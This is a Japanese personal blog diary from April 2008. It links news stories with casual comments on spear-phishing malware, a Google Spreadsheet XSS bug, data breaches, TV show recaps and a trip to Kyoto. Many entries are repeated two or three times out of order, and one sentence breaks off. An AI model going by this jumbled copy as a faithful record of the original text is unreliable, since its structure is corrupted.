←早く撤廃してくれ...
2008/04/12(土)土曜日ー。(いつまでも30番が埋まらないw)
[雑談] * 月面越しに“満地球” 周回衛星かぐやが撮影 (北海道新聞)
経由。 月、地球、太陽と、かぐやの軌道が一直線に並ぶ、年に2回しかないチャンスを捉えて撮影したものらしい。 キレイ☆ ・・・これは HDRI ぢゃないですよね?(ちがうw関連: * ハイビジョンカメラ(望遠)による「満地球の出」の撮影画像 (JAXA)
[雑談] * 25年間お疲れさま 南極観測船しらせ、最後の旅終える (asahi.com)
- まっちゃさん
経由。 月、地球、太陽と、かぐやの軌道が一直線に並ぶ、年に2回しかないチャンスを捉えて撮影したものらしい。 キレイ☆ ・・・これは HDRI ぢゃないですよね?(ちがうw関連: * ハイビジョンカメラ(望遠)による「満地球の出」の撮影画像 (JAXA)
[雑談] * 25年間お疲れさま 南極観測船しらせ、最後の旅終える (asahi.com)
textile最後の南極航海を終えた観測船「しらせ」が12日午前9時半過ぎ、1万4千キロ離れた昭和基地から東京港へ帰って来た。…荷下ろしの後、18日に海上自衛隊横須賀地方総監部へ戻り、8月に引退となる。南極観測船(砕氷艦)って、海上自衛隊の自衛艦だったのね。 知らなかった〜。(@_@)
textile「しらせ」の名前を引き継ぐ新観測船は16日、京都府舞鶴市で進水式を迎える。就航は来年のため、今秋出発の50次南極観測隊は豪州の砕氷船を使う。この“豪州の砕氷船”というのは、以前、プロペラが故障して南極で立ち往生していたのを「しらせ」が助けたことがあるという、縁のある船なんだそうです。 ⇒* オーロラ・オーストラリスの救援
2008/04/13(日)日曜日ー。(昨日のミスのための言い訳にする練習などない。)
[雑談] * 【RSA Conference】「三つの2.0がデータを危険にさらしている」 (ITPro)
Web 2.0 と Employee 2.0 と Enterprise 2.0 だそうですw 対抗して、Security 2.0 を始めなきゃw RSAカンファレンスって自作の流行語を広めるチャンスですねw みんな何かネタを用意しなくちゃ?w[雑談] * 個人情報:県のホームページから8人分流出 リンク設定誤り (毎日jp)
オリンピック終了までの間、ネットの規制を禁じられた某国が、発信元からの規制ができないのなら、いっそのこと相手サイトを落としちゃえ・・・と攻撃したのかどうかは定かではない、とw[雑談] * 世界初の「フルカラー3Dプリンタ」で何を作る? (ITmedia)
とうもろこし、格好いい! 原料から料理を形作る「* レプリケーター
」まで、もう一歩?w[雑談] * ちょっと凹んでいるので、気分転換にジタバタするほど美味しいケーキを (はてな)
落ち込んだときは、ぜひ、猫カフェに出かけましょうw 癒されますよぅ〜〜。[雑談] * 「解読不能は数学的に証明済み」、RSAを超える新暗号方式とは (@IT)
暗号化に使う関数自体を鍵として無限個の中から利用者が自由に選べる方式らしい?関連: * 「解読不能が数学的に証明された画期的な新暗号方式」が登場 (/.jp)
[雑談] * 「LOGiN」が休刊へ (ITmedia)
今、手元になぜか残っていた1987年の「LOGiN」を懐かしく開いてみたら、最新ゲーム特集で PC-9801M,VM 用の「うる星やつら」 6,800円(5D) とかが紹介されてた。 5Dってw[雑談] いろいろ。
Web 2.0 と Employee 2.0 と Enterprise 2.0 だそうですw 対抗して、Security 2.0 を始めなきゃw RSAカンファレンスって自作の流行語を広めるチャンスですねw みんな何かネタを用意しなくちゃ?w[雑談] * 個人情報:県のホームページから8人分流出 リンク設定誤り (毎日jp)
textile告知を掲載する際、申込書のリンク先に誤って参加者一覧も添付したという。これは「リンク設定誤り」と説明すべきモノなんだろうか。(^-^;[雑談] * チベット亡命政府サイトにサイバー攻撃 (AFPBB)
オリンピック終了までの間、ネットの規制を禁じられた某国が、発信元からの規制ができないのなら、いっそのこと相手サイトを落としちゃえ・・・と攻撃したのかどうかは定かではない、とw[雑談] * 世界初の「フルカラー3Dプリンタ」で何を作る? (ITmedia)
とうもろこし、格好いい! 原料から料理を形作る「* レプリケーター
」まで、もう一歩?w[雑談] * ちょっと凹んでいるので、気分転換にジタバタするほど美味しいケーキを (はてな)
落ち込んだときは、ぜひ、猫カフェに出かけましょうw 癒されますよぅ〜〜。[雑談] * 「解読不能は数学的に証明済み」、RSAを超える新暗号方式とは (@IT)
暗号化に使う関数自体を鍵として無限個の中から利用者が自由に選べる方式らしい?関連: * 「解読不能が数学的に証明された画期的な新暗号方式」が登場 (/.jp)
[雑談] * 「LOGiN」が休刊へ (ITmedia)
今、手元になぜか残っていた1987年の「LOGiN」を懐かしく開いてみたら、最新ゲーム特集で PC-9801M,VM 用の「うる星やつら」 6,800円(5D) とかが紹介されてた。 5Dってw[雑談] いろいろ。
- 「プリウスは静かすぎて危険」…米議会が「最低騒音」基準法案を検討 (痛いニュース)
- 入学金未納の生徒を入学式に出席させず 「学校は謝罪すべき」と教育評論家 (痛いニュース)
- イラクにおけるロボットの反乱(?)、鎮圧される (/.jp)
- 6万ボルトの電撃でパソコンを守るガードシステム (GIGAZINE)
- 今の給与水準はサービス残業を前提として設定されているのではないか (H-Yamaguchi.net)
2008/04/14(月)月曜日ー。(“オレオレ詐欺が減らないのは電話があるからだ”論法?w)
[動物] * 夢ねこDS: ずっといっしょにユメミルまいにち編
こ、これはヤバいw とろけてしまいそう〜〜〜。(*^^*)[雑談] * 720度回転してダンクシュートを華麗に決めているムービー (GIGAZINE)
これは超すごいフェイント技!なのか、格好つけてるだけなのか、判断に迷うなぁ。(ぇw[雑談] * 20名超の会議を必ず1時間で終わらせる“ライブドア流”会議術 (ld_directors)
「椅子の無い会議室で会議をする」とかいう系のアイディアを想像してたら違かったw[雑談] * 「今、刺しちゃった」 27歳女が「結婚に反対」と思い込み、婚約者の父親を刺す
そんな電話きたら怖いなぁ。 ホラーみたいだ。 父親の人を見る目が正しかったと。(汗[雑談] * MS:「VistaのUACはユーザーをいらいらさせるために搭載した」 (CNET)
タイトルだけ見たら何事かとw MSの製品ユニットマネージャーご乱心か?!みたいなw[TV][あいのり] #398 誘惑チェコ→スロバキア。 矢印: 宮くん→桃。 クロ→ドライバー。 聖二→よっこ。 ダニー、海。この日でチェコの旅は終了。 クロは、思いを寄せるシュテパーンとお別れ。(>_<)シュテパーン「本当に楽しかった。 ありがとう」 クロ「ありがとう・・・」スタッフ「好きって言わなくて良かったの?」クロ「うん。 彼女とかいるから それは大丈夫です。 旅がんばる」聖二がよっこを呼び出す。 会話がはずまず、懐から次々と折り紙を取り出しよっこに渡すw意外にも好評(?)だったw ⇒よっこの日記“『ひまだったから折った』って言ってたけど部屋で折ってる姿を想像したら可愛いなと思った”金庫番のダニーの失態で食事抜きが続いているメンバー、久しぶりに食事に。 そして食事の際に宮くんと他の男子メンバーとの様子がおかしいことに桃が気づく。桃「宮くん気分悪い? 頭痛い?」 宮くん「ちょっとトイレ行ってくる」その後、桃に問い詰められて重い口を開く男子メンバー。 宮くんの荷物を本人が居ない間にあさり、チョコレートやわかめスープを勝手に食べてしまっていたことを白状。桃「すっごいショックなんだけど、男メンがそんなことをするの。 仲間じゃないの? なんでそんなことすんの? 人の物勝手にあさるとか最低だよ! (宮くんは)心がガラスなんだよぅ? 割れたらもう戻らないよ?」昼食後、男子メンバーは宮くんの部屋に行き、謝罪。宮くん「いいよ、もう。 聖二らの気持ちは分かったから。 また今日からよろしくな」そして、日本に一時帰国中に・・・ダニーがリタイア。 (チョコレート&わかめスープ事件とは関係ないとのことw) ってか、ダニー、何しに来たんだw いいところ無かった気がするw⇒* 今週のあいのり
、 * あいのりウラ話(ダニーの日記)
※携帯サイト(有料)に、もう1つのウラ話(桃の日記)があるらしい。 ずるい。(ぇw
こ、これはヤバいw とろけてしまいそう〜〜〜。(*^^*)[雑談] * 720度回転してダンクシュートを華麗に決めているムービー (GIGAZINE)
これは超すごいフェイント技!なのか、格好つけてるだけなのか、判断に迷うなぁ。(ぇw[雑談] * 20名超の会議を必ず1時間で終わらせる“ライブドア流”会議術 (ld_directors)
「椅子の無い会議室で会議をする」とかいう系のアイディアを想像してたら違かったw[雑談] * 「今、刺しちゃった」 27歳女が「結婚に反対」と思い込み、婚約者の父親を刺す
そんな電話きたら怖いなぁ。 ホラーみたいだ。 父親の人を見る目が正しかったと。(汗[雑談] * MS:「VistaのUACはユーザーをいらいらさせるために搭載した」 (CNET)
タイトルだけ見たら何事かとw MSの製品ユニットマネージャーご乱心か?!みたいなw[TV][あいのり] #398 誘惑チェコ→スロバキア。 矢印: 宮くん→桃。 クロ→ドライバー。 聖二→よっこ。 ダニー、海。この日でチェコの旅は終了。 クロは、思いを寄せるシュテパーンとお別れ。(>_<)シュテパーン「本当に楽しかった。 ありがとう」 クロ「ありがとう・・・」スタッフ「好きって言わなくて良かったの?」クロ「うん。 彼女とかいるから それは大丈夫です。 旅がんばる」聖二がよっこを呼び出す。 会話がはずまず、懐から次々と折り紙を取り出しよっこに渡すw意外にも好評(?)だったw ⇒よっこの日記“『ひまだったから折った』って言ってたけど部屋で折ってる姿を想像したら可愛いなと思った”金庫番のダニーの失態で食事抜きが続いているメンバー、久しぶりに食事に。 そして食事の際に宮くんと他の男子メンバーとの様子がおかしいことに桃が気づく。桃「宮くん気分悪い? 頭痛い?」 宮くん「ちょっとトイレ行ってくる」その後、桃に問い詰められて重い口を開く男子メンバー。 宮くんの荷物を本人が居ない間にあさり、チョコレートやわかめスープを勝手に食べてしまっていたことを白状。桃「すっごいショックなんだけど、男メンがそんなことをするの。 仲間じゃないの? なんでそんなことすんの? 人の物勝手にあさるとか最低だよ! (宮くんは)心がガラスなんだよぅ? 割れたらもう戻らないよ?」昼食後、男子メンバーは宮くんの部屋に行き、謝罪。宮くん「いいよ、もう。 聖二らの気持ちは分かったから。 また今日からよろしくな」そして、日本に一時帰国中に・・・ダニーがリタイア。 (チョコレート&わかめスープ事件とは関係ないとのことw) ってか、ダニー、何しに来たんだw いいところ無かった気がするw⇒* 今週のあいのり
、 * あいのりウラ話(ダニーの日記)
※携帯サイト(有料)に、もう1つのウラ話(桃の日記)があるらしい。 ずるい。(ぇw
2008/04/15(火)火曜日ー。(大人気[=おとなげ]が大人気?w)
[出来事] * 日本政府をかたる偽メール、日本企業がターゲット (ITmedia)
によると、企業に限らず、大学の教員個人宛にも送られてきていたそうです。 “防衛省所管公益法人に異動事項がありました”という内容で、「0414.xls」「0414.exe」というファイルが ZIP で固めて添付されていたらしい。 「0414.exe」のほうが「Backdoor.Darkmoon」というマルウェアの亜種。関連: * 日本企業を狙った「スピアー攻撃」、日本政府からのメールを装う (ITPro)
[雑談] * オトナ語の謎。 オレ的にはアグリーできかねるんだよね。 (ほぼ日刊イトイ新聞)
笑えるw いつの間にか違和感なく使いこなせるようになってしまった自分にガクゼンですw[雑談] * ゴルゴ女問題 (らめぇ)
あー、近くにこんな子が居たら、私も迷わずゴルゴ男に変身しますよ。(←それダメw)関連: * ドキ!!ゴルゴ女だらけの飲み会ポロリもあるよ (暗渠)
[雑談] * 日本ではありえない? 韓国で野球よりも人気を集める「eスポーツ」の世界 (MYCOM)
こんなスポーツありなの?!w これなら私もスポーツマン(笑)になれそうw[雑談] * 楳図かずおさんの「まことハウス」、提訴住民2人が“毎月10万円払え” (痛いニュース)
万が一これが勝訴することになったら・・・大変だw 東京タワー、逃げてぇーw
- セキュメモ
によると、企業に限らず、大学の教員個人宛にも送られてきていたそうです。 “防衛省所管公益法人に異動事項がありました”という内容で、「0414.xls」「0414.exe」というファイルが ZIP で固めて添付されていたらしい。 「0414.exe」のほうが「Backdoor.Darkmoon」というマルウェアの亜種。関連: * 日本企業を狙った「スピアー攻撃」、日本政府からのメールを装う (ITPro)
[雑談] * オトナ語の謎。 オレ的にはアグリーできかねるんだよね。 (ほぼ日刊イトイ新聞)
笑えるw いつの間にか違和感なく使いこなせるようになってしまった自分にガクゼンですw[雑談] * ゴルゴ女問題 (らめぇ)
あー、近くにこんな子が居たら、私も迷わずゴルゴ男に変身しますよ。(←それダメw)関連: * ドキ!!ゴルゴ女だらけの飲み会ポロリもあるよ (暗渠)
[雑談] * 日本ではありえない? 韓国で野球よりも人気を集める「eスポーツ」の世界 (MYCOM)
こんなスポーツありなの?!w これなら私もスポーツマン(笑)になれそうw[雑談] * 楳図かずおさんの「まことハウス」、提訴住民2人が“毎月10万円払え” (痛いニュース)
万が一これが勝訴することになったら・・・大変だw 東京タワー、逃げてぇーw
2008/04/16(水)水曜日ー。(「恋人立ち退き説」<=>「恋人たちの季節」)
[雑談] * 秀逸な変換ミスの年間賞は「馬食い家内が象サイズになった」 (産経新聞)
笑えるw ところで、8番が左右逆のような気がするw このままだと「あの人猛獣役になったんだって」と打とうとしたら、「あの人もう重役になったんだって」と誤変換された!ということにw関連: * 第3弾 変“漢”ミスコンテスト (漢検)
[セキュリティ] * Google SpreadsheetのXSS脆弱性が明らかに (CNET)
[雑談] * “解読不能”の新暗号の記事について、いくつかのお詫び (@IT)
今回のは、時々出てくるトンデモな暗号とは少し違う予感はしますが、でも詳細は未知数。 早く権利関係をはっきりさせ、アルゴリズムなどを公開し、専門家にモマレルと良いですね。(@_@)[セキュリティ] * ソフトウエア等の脆弱性関連情報に関する届出状況 [2008年1月〜3月]
何ですかこのありえない伸び率はw 史上空前の届出ブームw いったい何が起きてるんだろ?[雑談] * ゴールドムンドGOLDMUNDの真実(おまけ) (楽譜の風景)
140万円もするプレイヤー、実は中身がパイオニアの2万円のDVDプレイヤーとほぼ同じ?!w[セキュリティ] * スパム関連のWebページは3秒ごとに出現 (ITmedia)
1日あたり2万3300ページが出現。 早く誰も騙されなくなって商売が廃れて欲しい。(-_-;関連: * 3秒ごとにネット上にスパムページが出現していることが判明 (GIGAZINE)
[雑談] * ターゲットは宇宙人? 「3.1415926535898.com」の正体とは!? (R25.jp)
[雑談] いろいろ。
←↑名前が笑えるw
←液晶でかくなった
←SLA次第
←新人用
←新人用?
←どっちが被害者なんだか。。
←近くに必要な人がw
←船外活動こわいw
←LED化の波w
←本屋に1枚1円で売る?w
笑えるw ところで、8番が左右逆のような気がするw このままだと「あの人猛獣役になったんだって」と打とうとしたら、「あの人もう重役になったんだって」と誤変換された!ということにw関連: * 第3弾 変“漢”ミスコンテスト (漢検)
[セキュリティ] * Google SpreadsheetのXSS脆弱性が明らかに (CNET)
textileサーバから戻されるHTTPレスポンスのコンテンツタイプを変更できたという。誤解を生みそうw そうじゃなくて、Google Spreadsheet の内容を CSV 形式で出力する機能があって、その際に Content-Disposition: attachment とか付いていなかったから、例えば、Internet Explorer だとコンテンツの内容を見て勝手に HTML だと判断してしまい、スクリプトの実行に至る状況だったと。関連: * Google XSS [Billy (BK) Rios]
[雑談] * “解読不能”の新暗号の記事について、いくつかのお詫び (@IT)
今回のは、時々出てくるトンデモな暗号とは少し違う予感はしますが、でも詳細は未知数。 早く権利関係をはっきりさせ、アルゴリズムなどを公開し、専門家にモマレルと良いですね。(@_@)[セキュリティ] * ソフトウエア等の脆弱性関連情報に関する届出状況 [2008年1月〜3月]
何ですかこのありえない伸び率はw 史上空前の届出ブームw いったい何が起きてるんだろ?[雑談] * ゴールドムンドGOLDMUNDの真実(おまけ) (楽譜の風景)
140万円もするプレイヤー、実は中身がパイオニアの2万円のDVDプレイヤーとほぼ同じ?!w[セキュリティ] * スパム関連のWebページは3秒ごとに出現 (ITmedia)
1日あたり2万3300ページが出現。 早く誰も騙されなくなって商売が廃れて欲しい。(-_-;関連: * 3秒ごとにネット上にスパムページが出現していることが判明 (GIGAZINE)
[雑談] * ターゲットは宇宙人? 「3.1415926535898.com」の正体とは!? (R25.jp)
textile僕らは地球内からの一般的なアクセスに加え、IPアドレスが不明なものを『地球外からのアクセス』としてカウントしています。…先日…このカウンターが動いたんですよ。…が、どうやらハッキングなど不明な手段によるカウントだったようです(笑)“(笑)” とか言ってていいのか、これw いっそのこと地球外からのハッキングだったらステキw[セキュリティ] いろいろ。
- Flashアニメでrootkitに感染、チベット騒乱便乗攻撃止まず (ITmedia)
- Windowsの脆弱性を突く「画像ウイルス」の作成ツールが出現 (ITPro)
- 新しい情報セキュリティへの認知は進まず--IPAが意識調査 (CNET)
- 情報セキュリティに関する脅威に対する意識調査(2007年度第2回)の報告書 (IPA)
- ブラウザ・プラグインの脆弱性、79%は「ActiveX」絡み (ComputerWorld)
- メモリ操作の安全性を確保する、ANSI C規格準拠C言語コンパイラ (/.jp)
[雑談] いろいろ。
- 「日記感覚のブログにいきなりコメントがつけられた感覚」を視覚化する「ブクシィ」
- ブクシィ
←↑名前が笑えるw
- 低価格ミニノート「EeePC」の第2弾「EeePC 900」が登場 (GIGAZINE)
←液晶でかくなった
- 「このシステムは落ちます」と言えますか? (ITPro)
←SLA次第
- 新社会人がバリバリ仕事をこなす方法 (shi3zの日記)
←新人用
- 新人におくる、怠惰な社会人になるための7の方法 (ロケスタ社長日記)
←新人用?
- 小学生を殴った72歳を逮捕 道端に止めた自転車を用水路に投げ入れられた事に腹を立てる (痛いニュース)
←どっちが被害者なんだか。。
- 仕事中に襲ってくる睡魔に打ち勝とう! (web-tan)
←近くに必要な人がw
- スペースデブリが増加して混沌とした地球の姿 (GIGAZINE)
←船外活動こわいw
- 歩行者横断用信号機が微妙にモデルチェンジしたワケ (ExciteBit)
←LED化の波w
- ネットで買った本によく“あの紙”が挟まってますが (ExciteBit)
←本屋に1枚1円で売る?w
2008/04/17(木)木曜日ー。(「経済波及効果」<=>「経済は急降下」)
[雑談] * 自分の声ソフト−Polluxstar
ikepyonさん経由。 “パソコンが「あなたの声」で話します”とのこと。 自己紹介用に。(ちがうw[セキュリティ] * 「失恋のうさばらし」ウイルス?、女性の写真や未練の言葉を表示 (ITPro)
未練ウィルス。 「Iloveu ○○○ and never forget you(○○を愛している。忘れられない)」[雑談] * ねとらぼ: 「奇跡のマイミク」って何? (ITmedia)
ま、参加したい人だけが参加しているのなら、外野から何か文句を言うこともないw[出来事] * 放映前の「コードギアス」、不正投稿検証用の映像を誤アップロード (IMPRESS)
不正投稿を自動で識別するシステムに与えるサンプル映像を、操作誤りでアップロード?関連: * 「コードギアス 反逆のルルーシュR2」放送前の第3話がネット上に流出 (GIGAZINE)
[セキュリティ] * 裁判所からマルウェア付きの詐欺メール、ファイアウォールをすり抜ける?
じゃあ、逆にどんなメールがファイアウォールで止まるというんだぃ!と思いながら記事を読んでみたら、ぜんぜん違う話だったw 感染後にキーストロークをリモートのサイトに送信する際に「acrobat.dll」という名前の DLL を使うので、例えファイアウォールにひっかかっても“Adobe Acrobatだと思って許可してしまう可能性が高い”という話らしいw
ikepyonさん経由。 “パソコンが「あなたの声」で話します”とのこと。 自己紹介用に。(ちがうw[セキュリティ] * 「失恋のうさばらし」ウイルス?、女性の写真や未練の言葉を表示 (ITPro)
未練ウィルス。 「Iloveu ○○○ and never forget you(○○を愛している。忘れられない)」[雑談] * ねとらぼ: 「奇跡のマイミク」って何? (ITmedia)
ま、参加したい人だけが参加しているのなら、外野から何か文句を言うこともないw[出来事] * 放映前の「コードギアス」、不正投稿検証用の映像を誤アップロード (IMPRESS)
不正投稿を自動で識別するシステムに与えるサンプル映像を、操作誤りでアップロード?関連: * 「コードギアス 反逆のルルーシュR2」放送前の第3話がネット上に流出 (GIGAZINE)
[セキュリティ] * 裁判所からマルウェア付きの詐欺メール、ファイアウォールをすり抜ける?
じゃあ、逆にどんなメールがファイアウォールで止まるというんだぃ!と思いながら記事を読んでみたら、ぜんぜん違う話だったw 感染後にキーストロークをリモートのサイトに送信する際に「acrobat.dll」という名前の DLL を使うので、例えファイアウォールにひっかかっても“Adobe Acrobatだと思って許可してしまう可能性が高い”という話らしいw
2008/04/18(金)金曜日ー。(「イブは空いています」 vs 「イブは相手います」)
[セキュリティ] * サウンドハウス、情報流出について詳細な経緯を公開 (/.jp)
これはすごい。 未だかつてインシデントの舞台裏がこんなに赤裸々に語られた文章があっただろうか。 カード会社の動きとか要請とか興味深い。 あと、「* HACKER SAFE
」 の “フェーズ3では、 Webアプリケーションのテストを行います。 …SQLインジェクションなどのアプリケーションレベルの脆弱性を検査します。” という謳い文句は・・・あまりアテにしないほうが良さそうだw関連: * 不正アクセスに伴うお客様情報流出に関するお詫びとお知らせ
**[pdf]**[雑談] * 「アナログ放送終わります」 テレビ画面に“常時字幕表示” (痛いニュース)
これはヒドいw 最初は画面の下部だが、最終的には画面の真ん中に・・・出たら面白いw[セキュリティ] * 「ウェブサイトのSQLインジェクション脆弱性の検出ツール」を公開 (IPA)
経由。 実装の検査ではなく、ログから脆弱性への攻撃の痕跡を探すツールらしい。 IIS と Apache のログが解析可能とのこと。 ・・・攻撃が POSTメソッドだったらどうするんだろう?(^-^;[動物] * 閉じ込められても、クールな猫と、あせる猫【今日の可愛いv】 (cat@log)
わぁ。 どっちの子も可愛い〜♪ らぶ。[雑談] * 「僕、アルバイトォォ!!」 店員(55)の叫びに強盗逃げ出す (痛いニュース)
吹いたw ファミリーマート汐留メディアタワー店。 レジを開けられないバイトなどいないw
これはすごい。 未だかつてインシデントの舞台裏がこんなに赤裸々に語られた文章があっただろうか。 カード会社の動きとか要請とか興味深い。 あと、「* HACKER SAFE
」 の “フェーズ3では、 Webアプリケーションのテストを行います。 …SQLインジェクションなどのアプリケーションレベルの脆弱性を検査します。” という謳い文句は・・・あまりアテにしないほうが良さそうだw関連: * 不正アクセスに伴うお客様情報流出に関するお詫びとお知らせ
**[pdf]**[雑談] * 「アナログ放送終わります」 テレビ画面に“常時字幕表示” (痛いニュース)
これはヒドいw 最初は画面の下部だが、最終的には画面の真ん中に・・・出たら面白いw[セキュリティ] * 「ウェブサイトのSQLインジェクション脆弱性の検出ツール」を公開 (IPA)
- ikepyonさん
経由。 実装の検査ではなく、ログから脆弱性への攻撃の痕跡を探すツールらしい。 IIS と Apache のログが解析可能とのこと。 ・・・攻撃が POSTメソッドだったらどうするんだろう?(^-^;[動物] * 閉じ込められても、クールな猫と、あせる猫【今日の可愛いv】 (cat@log)
わぁ。 どっちの子も可愛い〜♪ らぶ。[雑談] * 「僕、アルバイトォォ!!」 店員(55)の叫びに強盗逃げ出す (痛いニュース)
吹いたw ファミリーマート汐留メディアタワー店。 レジを開けられないバイトなどいないw
2008/04/19(土)土曜日ー。(京都に。 むしろ、女子大にw)
[イベント] * 第14回 まっちゃ139勉強会
第14回 まっちゃ139勉強会 「開発者のためのセキュリティ勉強会」セッション1: 「役に立たない HTML/JavaScript Hacks 4連発」「Webアプリの隙間でニッチなハックを楽しむ」(竹迫さん@サイボウズ・ラボ)セッション2: ライトニングトーク4連発1.セキュアコーディング勉強会の紹介(AzureStoneさん) 2.携帯電話と私(仮)(たけぞぉさん) 3.フレーゲの述語計算について(pgf2さん) 4.大規模なコードをチェックする取組みの一例(Y.Yさん) 日 時: 2008年04月19日(土曜日) 13時00分〜17時00分
場 所: * 京都女子大学
S校舎 109 教室 第14回 まっちゃ139懇親会日 時: 18時30分-20時30分(2時間) 会 場: * 酒菜遊美 悠悠亭
(三条) いやー、繁忙期ではないと思い込んでいたので、宿を取るのをずっと忘れていて、木曜日になってようやく探し始めたら、どこも空いていなくて焦りましたよw ホテルオークラの1泊5万円の部屋とかなら空いていましたけどw 飲み会終わって寝に帰るだけなのに、そんな高級なホテル取れませんw ま、その後、どうにか普通のホテルが見つかったので良かったですwただいま☆ 女子大は歩いているのが女の子ばかりで、嬉しいような落ち着かないような気分でしたw でも、まっちゃの会場の部屋に着いてみたら、今度は一気に男性率が高くて、安心したような悲しいような気分にw いつもなら何か風景の写真を載せるところですが、今回は客観的に見たら“これでカメラ持って歩いてたら私ってば不審者に見えるんじゃ?”と思ったので撮影を自粛しましたw 勉強会は、竹迫さんのメインの講演はもちろんのこと、ライトニングトークも楽しかったです♪ あと、女性参加者にマニアックな方が居て面白かったw (pgf2さんとか、XSSerな方とかw)
第14回 まっちゃ139勉強会 「開発者のためのセキュリティ勉強会」セッション1: 「役に立たない HTML/JavaScript Hacks 4連発」「Webアプリの隙間でニッチなハックを楽しむ」(竹迫さん@サイボウズ・ラボ)セッション2: ライトニングトーク4連発1.セキュアコーディング勉強会の紹介(AzureStoneさん) 2.携帯電話と私(仮)(たけぞぉさん) 3.フレーゲの述語計算について(pgf2さん) 4.大規模なコードをチェックする取組みの一例(Y.Yさん) 日 時: 2008年04月19日(土曜日) 13時00分〜17時00分
場 所: * 京都女子大学
S校舎 109 教室 第14回 まっちゃ139懇親会日 時: 18時30分-20時30分(2時間) 会 場: * 酒菜遊美 悠悠亭
(三条) いやー、繁忙期ではないと思い込んでいたので、宿を取るのをずっと忘れていて、木曜日になってようやく探し始めたら、どこも空いていなくて焦りましたよw ホテルオークラの1泊5万円の部屋とかなら空いていましたけどw 飲み会終わって寝に帰るだけなのに、そんな高級なホテル取れませんw ま、その後、どうにか普通のホテルが見つかったので良かったですwただいま☆ 女子大は歩いているのが女の子ばかりで、嬉しいような落ち着かないような気分でしたw でも、まっちゃの会場の部屋に着いてみたら、今度は一気に男性率が高くて、安心したような悲しいような気分にw いつもなら何か風景の写真を載せるところですが、今回は客観的に見たら“これでカメラ持って歩いてたら私ってば不審者に見えるんじゃ?”と思ったので撮影を自粛しましたw 勉強会は、竹迫さんのメインの講演はもちろんのこと、ライトニングトークも楽しかったです♪ あと、女性参加者にマニアックな方が居て面白かったw (pgf2さんとか、XSSerな方とかw)
2008/04/20(日)日曜日ー。(京都から大阪に〜。)
[雑談] 京都の伏見稲荷大社今回、三条近辺では宿が取れなかったので、深草(龍谷大の最寄り駅)のホテルに泊まりました。 そしたら、近くに「伏見稲荷大社」があるという看板を帰りがけに見つけたので、“あぁ、あの鳥居がたくさんあるので有名な神社? ちょっとお参りして来よう♪” と急遽思い立って行って来ました〜。本殿にお参りした後、有名な「千本鳥居」を通り抜け、その後、せっかく来たんだからぜんぶ回ってみるか〜と深く考えずにコースをたどり始めたら・・・ものすごく長かったですw 正直、「四ツ辻」でまだ半分と書いてある案内を見たときは引き返そうかと思いましたw (結局、山道を2時間歩きましたよ。(^-^;)お参りと言うよりハイキングみたいでしたw 途中、前後に誰も人が見えないときがあって、鳥居が無かったら遭難してたと思いますw 歩いてる間は、録音して流してるんじゃないか?と思わずスピーカーを探したほどの綺麗な鳥の鳴き声が聞こえました。 あと、山の中腹から龍谷大が見えました。(↓) [雑談] 四条河原町昨日は、七条から三条まで歩きましたが、今日はふつうに電車で四条へ。[動物][猫カフェ] 高槻の「ねこの部屋 あまえんぼう」に行って来ました〜♪左下の子は、この格好で熟睡していましたw 猫としてのプライドは無いのか!w
2008/04/21(月)月曜日ー。(ふくらはぎが筋肉痛にwww)
[雑談] 階段の上り下りがツライです。orz[セキュリティ] * Wizard Bible vol.40 (2008,4,17)
経由。 DNS の 「512バイトの壁」 のサシーミネタについては、IPv4 で、通常のクエリで 512バイトを超えるようなエントリを持っていないサイトでは、53/tcp はセカンダリ向けだけに解放するようにしてたりするかも。 IPv6 になったり、署名をつけたりするようになったら話は変わるのでしょうね。[雑談] 葉っぱさんのブクマから。
まにあっくだけど性格がゆがんでない可愛い女の子の新人、入ってこないかなぁw[TV][あいのり] #399 パンツの恋スロバキア共和国から、アフリカ大陸のガーナに移動。 スロバキア、放送一回ですか?!w矢印: 宮くん→桃。 聖二→よっこ。 クロ、海。新メンバー: * こーすけ
(22歳) O型、千葉県出身。 男性用パンツショップの店長さん。新メンバーのこーすけに食いつくクロ。 シュテパーンから新しい恋へ。クロ「なんかね、好きな芸能人鈴木紗理奈って言ってて・・・沢尻エリカとか言われるよりはなんか良かった。 すごい良い。 気が合う気がするしなんか楽しいすごい」宮くんと桃は、あいかわらず、ほのぼのな感じ♪ (^-^)桃「心理テストやる?」 宮くん「心理テスト?」桃「今から言う4つのアイテムでうちら(女性メンバー)3人の名前当てはめてね。 ネックレスの人とカバンの人とイヤリングの人とブーツの人」宮くん「桃はネックレスじゃない? よっこはブーツって感じかな。 イヤリングかなクロ」桃「ブーツが苦手な人。 イヤリングが自分のこと好きな人。 で・・・ネックレスが恋人にしたい人」
桃「ふふふふふ」 宮くん「ゴホ ゴホ ゴホ ゴホ ゴホ ゴホ ゴホ」元カノを忘れて(?)よっこへの恋に目覚めた聖二。聖二「付き合いたいね。 もう元カノ元カノじゃないからさ僕は。 結婚して安心を与えてあげたいっていうかさ。 本当に最後の恋愛結婚できるチャンスかもしれないんで」街で聖二とよっこが二人で話しているとき、近くで喧嘩が始まる。よっこ「いや〜 怖い」聖二“めちゃくちゃ嬉しかったっす。 テンションアゲアゲですよほんと。 うわ来ちゃったみたいな。 手繋いじゃったじゃないですか。 お腹いっぱいで。 心がいっぱいで。 嬉しいっす”元カノからプレゼントされた宝物の腕時計をまだつけている聖二だが、、、聖二「告白がOKでよっこと付き合うことができてその時よっこが『もう捨てて』って言うんだったら捨てます」ラバディービーチの砂浜で乗馬をすることになった7人。 馬があばれてこーすけが怪我。聖二「ちょっとこーすけのお見舞い行って来い。 たぶん一番心配してるのお前だと思うからさ。 だから傍にいて手握ってあげて大丈夫だよって言ってあげるだけでも全然違うしさ」クロ「みんなで行かなくていいの?」 聖二「必要ない必要ない。 そこは1人で行ったほうがいい」お見舞いに行った先でこーすけの洗髪や沐浴や洗濯をするクロ。 ついに・・・クロ「あはははははは。 こーすけかわいい。 なんか本当キュンとしちゃって。 でもそのキュンを隠さなきゃと思ってこのパンツでペシンて叩いた。 かわい〜! はははは」クロの日記“あたし好きな人ができたぁ その名もこーすけ!!!”来週は、また、あいのりがお休みらしい。(-_-;⇒* 今週のあいのり
、 * あいのりウラ話(新メンバーの日記)
- まっちゃさん
経由。 DNS の 「512バイトの壁」 の
- J U M P E R Z . N E T - BBS - document.write('<noscript>...</noscript>');
- 「届出状況2008Q1」@水無月ばけらのえび日記
textile「特定個人」が別の人に移り、割合も大幅に増加しただけという噂。すると、“政府機関のウェブサイトに関する届出が13%あり、通常の倍の割合” というのも、「特定個人」の趣味趣向が出てるだけ?w ・・・昼下がりのクロスサイトスクリプターとその師匠、怖いw[雑談] いろいろ。
